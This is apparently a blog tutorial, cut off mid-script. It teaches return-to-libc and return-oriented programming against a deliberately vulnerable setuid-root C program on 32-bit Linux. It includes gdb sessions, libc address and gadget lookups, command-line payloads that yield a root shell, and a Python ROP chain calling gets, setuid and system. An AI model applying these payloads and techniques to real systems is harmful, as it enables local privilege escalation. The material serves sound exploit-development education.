Return to libc on modern 32 bit and 64 bit Linux

What's up guys. In our last post we learned how to do stack based buffer overflow on a 64 bit Linux system. But we had most of protection mechanisms disabled. So we easily exploited the binary by loading our shellcode on stack and executing it by overwriting the return pointer with address of shellcode. Ultimately we executed code from stack. If you haven't read last post yet I recommend to read that first then start this. Now what if the stack is made non-executable. It means you may load shellcode in stack and overwrite return pointer, but you can't execute it.

Okay so we can't execute on stack. But we still control return pointer and can point it to some area in memory which is executable. And if we can find same cpu instructions as of our shellcode in that area we can get a shell. Though we may not get all instructions at one address only but we can try to chain them. Sounds cool.


By this time you must be familiar with at least basic instructions in assembly like push,pop,mov,lea,ret,etc and able to visualize layout of stack and registers after each instruction. If not you might feel lost further. Though I will still try to explain as much I can. In this post first we will be doing classic return to libc attack on an old 32 bit linux and then on modern 32 bit and 64 bit linux. Also learn about Return Oriented Programming(ROP) and ROP chaining.

Old 32 bit Linux

We will be using same vulnerable source code as previous article but this time will keep the stack non-executable. Compile and setuid-root flag to binary . ASLR is turned off. sudo nano /proc/sys/kernel/randomize_va_space set to '0'.
user@former:~$ gcc buf.c -o buf -fno-stack-protector
user@former:~$ sudo chown root buf
user@former:~$ sudo chmod +s buf
This time we don't have -z execstack flag. So the stack doesn't has NX bit on. Verify it with
user@former:~$ objdump -p buf
buf: file format elf32-i386
architecture: i386, flags 0x00000112:
start address 0x08048340

Program Header:
PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
filesz 0x000000e0 memsz 0x000000e0 flags r-x
INTERP off 0x00000114 vaddr 0x08048114 paddr 0x08048114 align 2**0
filesz 0x00000013 memsz 0x00000013 flags r--
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
filesz 0x00000514 memsz 0x00000514 flags r-x
LOAD off 0x00000514 vaddr 0x08049514 paddr 0x08049514 align 2**12
filesz 0x0000010c memsz 0x00000114 flags rw-
DYNAMIC off 0x00000528 vaddr 0x08049528 paddr 0x08049528 align 2**2
filesz 0x000000d0 memsz 0x000000d0 flags rw-
NOTE off 0x00000128 vaddr 0x08048128 paddr 0x08048128 align 2**2
filesz 0x00000044 memsz 0x00000044 flags r--
STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
filesz 0x00000000 memsz 0x00000000 flags rw-  <======Only read and write permissions for stack
Let's load it in gdb and disassemble it. The addresses now are just 4 bytes(4*8=32bits) since it is a 32 bit elf executable.
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:  push ebp
0x080483f5 <main+1>:  mov ebp,esp                   ; prologue
0x080483f7 <main+3>:  and esp,0xfffffff0            ; and operation sets last digit in esp to 0
0x080483fa <main+6>:  add esp,0xffffff80            ; Allocate 0x80 bytes stack space
0x080483fd <main+9>:  mov eax,DWORD PTR [ebp+0xc]   ; eax=value of [ebp+0xc]
0x08048400 <main+12>: add eax,0x4                  ; eax=eax+0x4
0x08048403 <main+15>: mov eax,DWORD PTR [eax]      ; eax=value at addr eax
0x08048405 <main+17>: mov DWORD PTR [esp+0x4],eax  ; value of [esp+0x4]=eax - arg for strcpy  
0x08048409 <main+21>: lea eax,[esp+0x1c]           ; eax=addess of [esp+0x1c] 
0x0804840d <main+25>: mov DWORD PTR [esp],eax      ; value at addr [esp]= eax - arg for strcpy
0x08048410 <main+28>: call 0x8048320 <strcpy@plt>  ; call strcpy function
0x08048415 <main+33>: mov eax,0x8048500            ; eax=0x8048500 arg-"Input was: %s\n"
0x0804841a <main+38>: lea edx,[esp+0x1c]           ; edx=address of [esp+0x1c]
0x0804841e <main+42>: mov DWORD PTR [esp+0x4],edx  ; value at [esp+0x4]= edx - addr of buf[100]
0x08048422 <main+46>: mov DWORD PTR [esp],eax      ; value at [esp]=eax - "Input was: %s\n"
0x08048425 <main+49>: call 0x8048330 <printf@plt>  ; call printf function
0x0804842a <main+54>: mov eax,0x0                  ; eax=0x0
0x0804842f <main+59>: leave                        ; prologue
0x08048430 <main+60>: ret 
End of assembler dump.
One difference you might see from 64 bit disassembly is that the arguments for functions are loaded on top of stack. For example see line *main+42 and 46. May be this property can be helpful to us in future exploitation. Now we need to figure out offset for return address to point to some executable area in memory and chain few instructions for arbitrary code execution. First we will find out Process id for our process with print getpid() in gdb and see process maps for our process with shell cat /proc/$pid/maps or info proc maps.
(gdb) p getpid()
$1 = 1864
(gdb) shell cat /proc/1864/maps
08048000-08049000 r-xp 00000000 00:10 5732       /home/user/buf
08049000-0804a000 rw-p 00000000 00:10 5732       /home/user/buf
b7e96000-b7e97000 rw-p 00000000 00:00 0 
b7e97000-b7fd5000 r-xp 00000000 00:10 759        /lib/
b7fd5000-b7fd6000 ---p 0013e000 00:10 759        /lib/
b7fd6000-b7fd8000 r--p 0013e000 00:10 759        /lib/
b7fd8000-b7fd9000 rw-p 00140000 00:10 759        /lib/
b7fd9000-b7fdc000 rw-p 00000000 00:00 0 
b7fe0000-b7fe2000 rw-p 00000000 00:00 0 
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 00:10 741        /lib/
b7ffe000-b7fff000 r--p 0001a000 00:10 741        /lib/
b7fff000-b8000000 rw-p 0001b000 00:10 741        /lib/
bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]
What's that ?

C Standard Library - libc

Let's read man page for it, 'man libc'. The term "libc" is commonly used as a shorthand for the "standard C library", a library of standard functions that can be used by all C programs (and sometimes by programs in other languages). So it consists functions, type definitions, header files for string handling, mathematical operations, I/O, etc tasks and linux OS operating services. Your functions like printf, strcpy, execve, system, etc are defined in it. When such function is called by your program this library is dynamically linked to it. Then your program knows how to carry out operations for that function. We will read more about how it is dynamically linked in ret2plt and ret2got exploits. So it even contains instructions for functions like execve, execl, system,etc. And we know that with proper arguments we can (ab)use them to execute a shell. Let's try it. First find the offset of return address.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Starting program: /home/user/buf Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Input was: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A

Program received signal SIGSEGV, Segmentation fault.
0x64413764 in ?? ()

user@former:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 64413764
[*] Exact match at offset 112
We can call "/bin/sh" with execve or system, but execve takes 2 arguments as NULL, and since our vulnerable code uses strcpy we can't get null bytes on stack directly. We will see how to get null bytes on stack further in this post. For now let's just use system. We will also use Python Exploit Development Assistant (PEDA) for gdb this time. You can install it from it's github page here. A code for function system to execute /bin/sh will look like this. Compiling and executing it will give you a /bin/sh shell. Let's load it in gdb, set breakpoint at function call and see how arguments are passed to it.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x080483c4 <+0>: push   ebp
   0x080483c5 <+1>: mov    ebp,esp
   0x080483c7 <+3>: and    esp,0xfffffff0
   0x080483ca <+6>: sub    esp,0x10
   0x080483cd <+9>: mov    DWORD PTR [esp],0x80484a0
   0x080483d4 <+16>: call   0x80482ec <system@plt>
   0x080483d9 <+21>: leave  
   0x080483da <+22>: ret    
End of assembler dump.
gdb-peda$ b *main+16
Breakpoint 1 at 0x80483d4
gdb-peda$ r
Starting program: /home/archer/compiler_tests/sys 
EAX: 0xf7f98d98 --> 0xffffd0fc 
EBX: 0x0 
ECX: 0xb73f45c0 
EDX: 0xffffd084 --> 0x0 
ESI: 0xf7f96e28 --> 0x1ced30 
EDI: 0x0 
EBP: 0xffffd058 --> 0x0 
ESP: 0xffffd040 --> 0x80484a0 ("/bin/sh")
EIP: 0x80483d4 (<main+16>: call   0x80482ec <system@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x80483c7 <main+3>: and    esp,0xfffffff0
   0x80483ca <main+6>: sub    esp,0x10
   0x80483cd <main+9>: mov    DWORD PTR [esp],0x80484a0
=> 0x80483d4 <main+16>: call   0x80482ec <system@plt>
   0x80483d9 <main+21>: leave  <=return address for function 'system'
   0x80483da <main+22>: ret    
   0x80483db: nop
   0x80483dc: nop
Guessed arguments:
arg[0]: 0x80484a0 ("/bin/sh")
0000| 0xffffd040 --> 0x80484a0 ("/bin/sh")
0004| 0xffffd044 --> 0x80481e4 --> 0x30 ('0')
0008| 0xffffd048 --> 0x80483fb (<__libc_csu_init+11>: add    ebx,0x1199)
0012| 0xffffd04c --> 0x0 
0016| 0xffffd050 --> 0xf7f96e28 --> 0x1ced30 
0020| 0xffffd054 --> 0xf7f96e28 --> 0x1ced30 
0024| 0xffffd058 --> 0x0 
0028| 0xffffd05c --> 0xf7de0793 (<__libc_start_main+243>: add    esp,0x10)
Legend: code, data, rodata, value

Breakpoint 1, 0x080483d4 in main ()
Hmm. It takes one argument from top of stack that is address of string "/bin/sh". One more thing to notice is whenever a function is called it takes the next address as its return address. So when the function is done execution, the program counter will point back to return address. Here it will return to *main+21 i.e. 0x80483d9. To call system and execute shell we need to load proper arguments on stack and overwrite return address of vulnerable program with address of system function in libc. Sounds doable. Load the vulnerable program back in gdb and run it once with a breakpoint so that libc is dynamically linked. Time to find address of system function.
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
Great. Now let's see how our payload must look like.
payload = 112 bytes of junk + system + return address for system + address of "/bin/sh"
Notice how first thing after address of system is a return address and not the first argument to function. This is because if you step into a function call, at first you will see the return address is actually saved on top of stack and then stack space for the function is created, so after function is done it will restore stack and execute the ret instruction to return to caller and the previously saved return address will now again be on top of stack. In our case since we are directly jumping to the function address and not using the call instruction to call function, so when the function is done it will execute its ret instruction and look for return address on top of stack. Therefore we have to provide a return address before the arguments. This info will be useful further in making longer ROP chains.

We already have address of system. Return address for system can be anything but if it's invalid address it might give segmentation fault after exitting shell as eip will try reading from it. Here I will return it to exit function so that after executing shell the program will exit without errors.
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7ec60c0 <*__GI_exit>
Third thing we need to find is address of "/bin/sh" string. Let's see if it can be found in libc library.
user@former:~$ strings -t x /lib/ | grep "/bin/sh"
 11f3bf /bin/sh
Got it. The strings command will print all strings in /lib/ -t x flag will print offset of each string in hexadecimal. Pipe it to grep command which will print line containing "/bin/sh" Great. Offset of /bin/sh is 0x11f3bf  in libc. To find exact address just add that to base of libc we found in process maps. x/s will print value in that address as string.
(gdb) x/s 0xb7e97000+0x11f3bf
0xb7fb63bf:  "/bin/sh"
You can also view process mappings in peda with vmmap.
gdb-peda$ vmmap
Start    End      Perm  Name
08048000 08049000 r-xp /home/user/buf
08049000 0804a000 rw-p /home/user/buf
b7e96000 b7e97000 rw-p /home/user/buf
b7e97000 b7fd5000 r-xp /lib/
b7fd5000 b7fd6000 ---p /lib/
b7fd6000 b7fd8000 r--p /lib/
b7fd8000 b7fd9000 rw-p /lib/
b7fd9000 b7fdc000 rw-p mapped
b7fe0000 b7fe2000 r--p [vvar]
b7fe2000 b7fe3000 r-xp [vdso]
b7fe3000 b7ffe000 r-xp /lib/
b7ffe000 b7fff000 r--p /lib/
b7fff000 b8000000 rw-p /lib/
bffeb000 c0000000 rw-p [stack]
Time to make final payload and run. Remember to enter address in little endian.
user@former:~$ ./buf `python2 -c "print 'A'*112 + '\xb0\xff\xec\xb7'+'\xc0\x60\xec\xb7' + '\xbf\x63\xfb\xb7'"`
# id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
# whoami
# exit
Bingo we have a root shell and it didn't even require us to load a shellcode also we exited without error. If you fill return address for system function with random 4 bytes you might see Segmentation fault. Since this was an old 32 bit linux we didn't have to worry about setuid(0);  Also the libc addresses won't change outside gdb so you need not to worry about them. This was fairly easy. Time for a modern 32 bit compiled binary which might have few more protection mechanisms.

Modern 32 bit ELF Binary

This time I will compile the same binary for 32 bit architecture on modern compiler. I am using 64 bit Ubuntu 17.10 for compilation so there will be-m32 flag for compiler to force 32 bit architecture. You might wanna install gcc-multilib first for 32 bit compilation on 64 bit. ASLR and stack canaries are still disabled.
virtual@mecha:~$ cat /proc/sys/kernel/randomize_va_space
virtual@mecha:~$ gcc buf.c -o buf -m32 -fno-stack-protector
virtual@mecha:~$ sudo chown root buf
virtual@mecha:~$ sudo chmod +s buf
Load it in gdb and disassemble. I have explained each instruction on right. You may not need to know each and every instruction for exploit. Just visualizing changes in layout of stack and registers at key instructions is enough. You can also check the security protections in binary with checksec command in PEDA.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
gdb-peda$ disas main
Dump of assembler code for function main:
   0x0000054d <+0>: lea    ecx,[esp+0x4]           ; ecx = address of [esp+0x4]
   0x00000551 <+4>: and    esp,0xfffffff0          ; and operation on esp.
   0x00000554 <+7>: push   DWORD PTR [ecx-0x4]     ; push value at [ecx-0x4] i.e. esp on stack
   0x00000557 <+10>: push   ebp                     ; push ebp on stack
   0x00000558 <+11>: mov    ebp,esp                 ; ebp=esp
   0x0000055a <+13>: push   ebx                     ; push ebx on stack
   0x0000055b <+14>: push   ecx                     ; push ecx onstack
   0x0000055c <+15>: sub    esp,0x70                ; allocate 0x70=112 bytes on stack
   0x0000055f <+18>: call   0x450 <__x86.get_pc_thunk.bx>
   0x00000564 <+23>: add    ebx,0x1a70              ; ebx=ebx+0x1a70
   0x0000056a <+29>: mov    eax,ecx                 ; eax=ecx
   0x0000056c <+31>: mov    eax,DWORD PTR [eax+0x4] ; eax = value at addr [eax+0x4]
   0x0000056f <+34>: add    eax,0x4                 ; eax=eax+4
   0x00000572 <+37>: mov    eax,DWORD PTR [eax]     ; eax= value at addr [eax]
   0x00000574 <+39>: sub    esp,0x8                 ; esp=esp-0x8
   0x00000577 <+42>: push   eax                     ; push eax on stack
   0x00000578 <+43>: lea    eax,[ebp-0x6c]          ; load effective addr of [ebp-0x6c] to eax
   0x0000057b <+46>: push   eax                     ; push eax on stack
   0x0000057c <+47>: call   0x3e0 <strcpy@plt>      ; call strcpy function
   0x00000581 <+52>: add    esp,0x10                ; esp=esp+0x10
   0x00000584 <+55>: sub    esp,0x8                 ; esp=esp-0x8
   0x00000587 <+58>: lea    eax,[ebp-0x6c]          ; load effective addr of [ebp-0x6c] to eax
   0x0000058a <+61>: push   eax                     ; push eax on stack
   0x0000058b <+62>: lea    eax,[ebx-0x19a4]        ; load effective addr of [ebx-0x19a4] to eax
   0x00000591 <+68>: push   eax                     ; push eax on stack
   0x00000592 <+69>: call   0x3d0 <printf@plt>      ; call printf function
   0x00000597 <+74>: add    esp,0x10                ; esp=esp+0x10
   0x0000059a <+77>: mov    eax,0x0                 ; eax=0x0
   0x0000059f <+82>: lea    esp,[ebp-0x8]           ; load effective addr of [ebp-0x8] to esp
   0x000005a2 <+85>: pop    ecx                     ; pop top of stack to ecx
   0x000005a3 <+86>: pop    ebx                     ; pop top of stack to ebx
   0x000005a4 <+87>: pop    ebp                     ; pop top of stack to ebp
   0x000005a5 <+88>: lea    esp,[ecx-0x4]           ; load effective addr of [ecx-0x4] to esp
   0x000005a8 <+91>: ret
End of assembler dump.
Well this seems pretty different from our previous disassembly. There seems to be an additional protection mechanism. Instead of directly pusing ebp and saving esp in ebp and changing it back with leave instruction, here address of [esp+0x4] is first stored in ecx, then restored at last. Also ecx is pushed on stack then poped back at last. It means if we overflow buffer we might overwrite ecx with some random junk and esp will never point back to proper address at end. We won't even be able to call functions like system to execute our shell because ecx contains junk from buffer. After esp is loaded at some random address with instruction lea esp,[ecx-0x4], the next instruction ret will pop the address at top of stack and eip will then point to it. Wait. Did I just stay ecx is on stack and our buffer can overwrite it ? Great, we can find offset of ecx, overwrite it and make it point to correct [esp+0x4] address. We control ecx, so we also control esp which points to top of stack. We don't even need to worry about return pointer cause the next ret instruction will pop value at top of stack and eip will point to that value. Lost ? Don't worry you will understand in practical. First load the program in gdb and calculate offset for ecx.
gdb-peda$ r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Starting program: /home/virtual/buf Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Input was: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A

Program received signal SIGSEGV, Segmentation fault.

EAX: 0x0 
EBX: 0x35644134 ('4Ad5')
ECX: 0x64413364 ('d3Ad')
EDX: 0xf7fb6894 --> 0x0 
ESI: 0x2 
EDI: 0xf7fb5000 --> 0x1ced70 
EBP: 0x41366441 ('Ad6A')
ESP: 0x64413360 ('`3Ad')
EIP: 0x565555a8 (<main+91>: ret)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x565555a3 <main+86>: pop    ebx
   0x565555a4 <main+87>: pop    ebp
   0x565555a5 <main+88>: lea    esp,[ecx-0x4]
=> 0x565555a8 <main+91>: ret    
   0x565555a9: xchg   ax,ax
   0x565555ab: xchg   ax,ax
   0x565555ad: xchg   ax,ax
   0x565555af: nop
Invalid $SP address: 0x64413360
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x565555a8 in main ()
ecx is 0x64413364. As you can see stack pointer also points to [ecx-0x4] i.e. 0x64413360. So we are correct. We control ecx and also the esp.
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 64413364
[*] Exact match at offset 100
So ecx is located just after buf[100]. Let's visualize it. I have also marked how we want it to look like after our exploit.

What we want is to get address of system on top of stack as top of stack will be return address for ret instruction, followed by it's arguments like we did last time. And we control top of stack. After instruction at *main+88 the esp will be [ecx-0x4]. This is what our payload will be.
payload = 100 bytes junk + address of esp+0x4 +|system + exit + addr of /bin/sh
                                               ^---we want esp to point here.
Time to find the unknowns.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7e22d60 <system>
gdb-peda$ p exit
$2 = {<text variable, no debug info>} 0xf7e16070 <exit>
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xf7f5c311 ("/bin/sh")
Found system and exit function. This time i just used find command in gdb-peda to search for string "/bin/sh". It found it in libc. Here we execute /bin/sh with system. If you want to execute some other command and you can't find it in libc then you can export it as environment variable and find it's address using find command, like we did in previous article. It can be on stack as we just need to read the argument. Missing thing now is desired stack address. Let's run the exploit with current payload and random bytes in place of ecx. Set breakpoint at *main+85 to view stack before ecx is popped out.
payload = 100*'A' +'BBBB' + '\x60\x2d\xe2\xf7' + '\x70\x60\xe1\xf7' + '\x11\xc3\xf5\xf7'")
gdb-peda$ b *main+85
Breakpoint 3 at 0x565555a2
gdb-peda$ r $(python2 -c "print 'A'*100+'BBBB'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")
Starting program: /home/virtual/buf $(python2 -c "print 'A'*100+'BBBB'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")

EAX: 0x0 
EBX: 0x56556fd4 --> 0x1edc 
ECX: 0x80 
EDX: 0xf7fb6894 --> 0x0 
ESI: 0x2 
EDI: 0xf7fb5000 --> 0x1ced70 
EBP: 0xffffd248 --> 0xf7e16070 (<exit>: call   0xf7f184b9)
ESP: 0xffffd240 ("BBBB`-\342\367p`\341\367\021\303\365", )
EIP: 0x565555a2 (<main+85>: pop    ecx)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x56555597 <main+74>: add    esp,0x10
   0x5655559a <main+77>: mov    eax,0x0
   0x5655559f <main+82>: lea    esp,[ebp-0x8]
=> 0x565555a2 <main+85>: pop    ecx
   0x565555a3 <main+86>: pop    ebx
   0x565555a4 <main+87>: pop    ebp
   0x565555a5 <main+88>: lea    esp,[ecx-0x4]
   0x565555a8 <main+91>: ret
0000| 0xffffd240 --> ("BBBB`-\342\367p`\341\367\021\303\365", )
0004| 0xffffd244 --> 0xf7e22d60 (<system>: sub    esp,0xc)
0008| 0xffffd248 --> 0xf7e16070 (<exit>: call   0xf7f184b9)
0012| 0xffffd24c --> 0xf7f5c311 ("/bin/sh")
0016| 0xffffd250 --> 0x0 
0020| 0xffffd254 --> 0xf7fb5000 --> 0x1ced70 
0024| 0xffffd258 --> 0x0 
0028| 0xffffd25c --> 0xf7dfe986 (<__libc_start_main+246>: add    esp,0x10)
Legend: code, data, rodata, value

Breakpoint 3, 0x565555a2 in main ()
System is at 0xffffd244. We want our esp to point here. esp = [ecx-0x4] then [ecx] = esp+0x4. Therefore ecx = 0xffffd244 + 0x4 = 0xffffd248. Seems we have everything we want. Time for final run.
payload = 'A'*100+'\x48\xd2\xff\xff'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'
gdb-peda$ r $(python2 -c "print 'A'*100+'\x48\xd2\xff\xff'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")
Starting program: /home/virtual/buf $(python2 -c "print 'A'*100+'\x48\xd2\xff\xff'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")
[New process 5875]
process 5875 is executing new program: /bin/dash
[New process 5876]
process 5876 is executing new program: /bin/dash
Great we got shell. If you are wondering why it executed /bin/dash two times, it's because system function actually executes command in format "/bin/sh -c <command>". Here command is /bin/sh. You can read man page of system for more info. Execute it outside gdb. Remember address of esp will change outside gdb. So you need to shift address of ecx in payload. One way to find offset is using a simple code like this. Compile and run it once inside gdb and once outside. You will get a rough idea of change and it mostly works out, or just brute force it like this. Let's run it.
virtual@mecha:~$ python2 
$ id 
uid=1000(virtual) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
$ whoami
Cool it works. But again our privileges were dropped like last time. This isn't what we want !

For that we need to execute setuid(0); first. But how ?

Return Oriented Programming

Remember how we used the code already in memory to execute our instructions and thus bypassing Data Execution Prevention ? Yeah I mean first we returned to function 'system', passed it few arguments and a return address, then after execution it returned to 'exit' function. That exactly is Return Oriented Programming. You can read more on it's wiki here. setuid function can also be found in libc library. So we can return to it and pass it proper arguments from stack. We want it to be setuid(0);. That means '0' must be the argument. But that is a NULL character ! Things get a bit tricky here. How can we get a null character, actually 4 null characters (0x00000000=4 bytes) on stack because strcpy funtion won't copy NULL characters ?

How do functions like strcpy, gets, memcpy work ? If you read the man page and you will see that they take arguments like source address and destination address and copy bytes from source to destination. Hmmm. We can call these functions before setuid and overwrite the arguments for setuid with NULLs. We can't use strcpy. It won't copy null bytes. What about gets ? Let's read it's man page.
gets() reads a line from stdin into the buffer pointed to by s until either a 
terminating newline or EOF, which it replaces with a null byte ('\0').
So end of our string in 'gets' function is replaced by a null byte. What if we enter no input ? That means just a null byte will be passed to stack. Yeah we did it !

Remember this is not the only way. You should explore more and if you want you can share your ways with us in the comments. For example one way we are gonna learn in format string exploit.

So 'gets' takes two arguments. One is it's return address and next is destination address to write to. This is what our payload will look like.
payload = 'A'*100 + [esp-0x4] + 'B'*4 + gets + return address + dest + setuid + arg + system + exit + /bin/sh
In order to properly execute our exploit we need to get 4 null bytes as these four bytes will be arguments to setuid. Since only one null byte is passed on each call we will call 'gets' four times. But there's a small problem in doing so. Think about it. When we first call 'gets' it's arguments are on stack. if we directly return to next 'gets' it's arguments will be messed up. We need to somehow clear the stack for next function call.

Exactly. We will pop the top of stack first so that we can then return to next 'gets' function call. For that we need to find pop;ret instruction and return to it first. It will clear stack for us and then the ret instruction will set program counter to next address on top of stack. And again libc is great place to find such instruction. One way is like this.
virtual@mecha:~$ objdump -d -M intel /lib32/ | grep -B1 ret | grep pop -A1 -m 4
 1804b: 5f pop edi
 1804c: c3 ret 
 1816f: 5d pop ebp
 18170: c3 ret 
 181e6: 5e pop esi
 181e7: c3 ret 
 182b9: 5d pop ebp
 182ba: c3 ret
It finds four pop followed by ret instruction. Each set of such instructions is called 'ROP Gadget'. ROP gadgets aren't just limited to pop; ret. They can be any series of instructions you want.

Processors are dumb

We know assembly is just mneumonics for such opcodes and processors start executing op-codes wherever they see them, even if it's from middle of any other instruction. What I mean is suppose there's an instruction which contains '5f' followed by 'c3'. If you point processor to '5fc3' then it will execute instruction 'pop edi; ret'  irrespective of the original instruction and go on. All we have to do is find '5f' followed by 'c3' in libc. This way we can find even more gadgets.
virtual@mecha:~$ xxd -c1 -p /lib32/ | grep -n -B1 c3 | grep 5f -m3 -A1
virtual@mecha:~$ xxd -c1 -p /lib32/ | grep -n -B1 c3 | grep 5f -m3| awk '{printf"%x\n",$1-1}'
What I did here is
  1. make a plain hexdump(-p) of libc one byte per line(-c1).
  2. Pipe it and find all occurences of c3 with offset(-n) and one line just behind(-B1) it.
  3. Pipe and check if that is 5f and print 3 such occurences(-m3) with one line after(-A1) it.
  4. print the offset for '5f'($1-1) in hexadecimal(%x).
Add the offset in libc base address and you will get your instructions.
gdb-peda$ x/2i 0xf7de6000+0x1804b
   0xf7dfe04b: pop    edi
   0xf7dfe04c: ret
But this way sucks right ? You can make your own tool to automate it. There are great tool already available like ROPgadget and Ropper which do the same work for you more smartly and also have lot of options to help you in ROP exploitation. Let's see how our stack will look like now.

Time to make payload and find missing addresses. We currently don't know the address of first occurrence of 'gets' and argument for setuid which we need to overwrite with NULLs.
gdb-peda$ p gets
$1 = {<text variable, no debug info>} 0xf7e4c610 <gets>
gdb-peda$ p setuid
$2 = {<text variable, no debug info>} 0xf7ea3e60 <setuid>
Making a python script this time.
from struct import pack
pop=pack("I",0xf7dfe04b)            #pop;ret
sh=pack("I",0xf7f5c311)             #/bin/sh string
dest='DDDD'                         #first byte of setuid arg
desta='DDDD'                        #second byte of setuid arg
destb='DDDD'                        #third byte of setuid arg
destc='DDDD'                        #fourth byte of setuid arg
payload = ''
payload+= junk + ecx + pad
payload+= gets + pop + dest
payload+= gets + pop + desta
payload+= gets + pop + destb
payload+= gets + pop + destc
payload+= setuid + pop + pad        #argument for setuid
payload+= system + exit + sh
print payload
Set breakpoint and run exploit.
gdb-peda$ b *main+85
Breakpoint 1 at 0x5a2
gdb-peda$ r `python2`
Starting program: /home/virtual/buf `python2`

EAX: 0x0 
EBX: 0x56556fd4 --> 0x1edc 
ECX: 0xc0 
EDX: 0xf7fb6894 --> 0x0 
ESI: 0x2 
EDI: 0xf7fb5000 --> 0x1ced70 
EBP: 0xffffd208 --> 0xf7e4c610 (<gets>: push   ebp)
ESP: 0xffffd200 ("CCCC")
EIP: 0x565555a2 (<main+85>: pop    ecx)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   0x56555597 <main+74>: add    esp,0x10
   0x5655559a <main+77>: mov    eax,0x0
   0x5655559f <main+82>: lea    esp,[ebp-0x8]
=> 0x565555a2 <main+85>: pop    ecx
   0x565555a3 <main+86>: pop    ebx
   0x565555a4 <main+87>: pop    ebp
   0x565555a5 <main+88>: lea    esp,[ecx-0x4]
   0x565555a8 <main+91>: ret
0000| 0xffffd200 ("CCCC")
0004| 0xffffd204 ("BBBB")
0008| 0xffffd208 --> 0xf7e4c610 (<gets>: push   ebp)
0012| 0xffffd20c --> 0xf7dfe04b (pop    edi)
0016| 0xffffd210 ("DDDD")
0020| 0xffffd214 --> 0xf7e4c610 (<gets>: push   ebp)
0024| 0xffffd218 --> 0xf7dfe04b (pop    edi)
0028| 0xffffd21c ("DDDD")
Legend: code, data, rodata, value

Breakpoint 1, 0x565555a2 in main ()
gdb-peda$ x/20xw $esp
0xffffd200: 0x43434343 0x42424242 0xf7e4c610 0xf7dfe04b
0xffffd210: 0x44444444 0xf7e4c610 0xf7dfe04b 0x44444444
0xffffd220: 0xf7e4c610 0xf7dfe04b 0x44444444 0xf7e4c610
0xffffd230: 0xf7dfe04b 0x44444444 0xf7ea3e60 0xf7dfe04b
0xffffd240: 0x42424242 0xf7e22d60 0xf7e16070 0xf7f5c311
First 'gets' is at 0xffffd208 so ecx=0xffffd208+0x4=0xffffd20c. And our argument for setuid comes at 0xffffd240. Let's modify our script.
from struct import pack
pop=pack("I",0xf7dfe04b)              #pop;ret
sh=pack("I",0xf7f5c311)               #/bin/sh string
dest=pack("I",0xffffd240)             #first byte of setuid arg
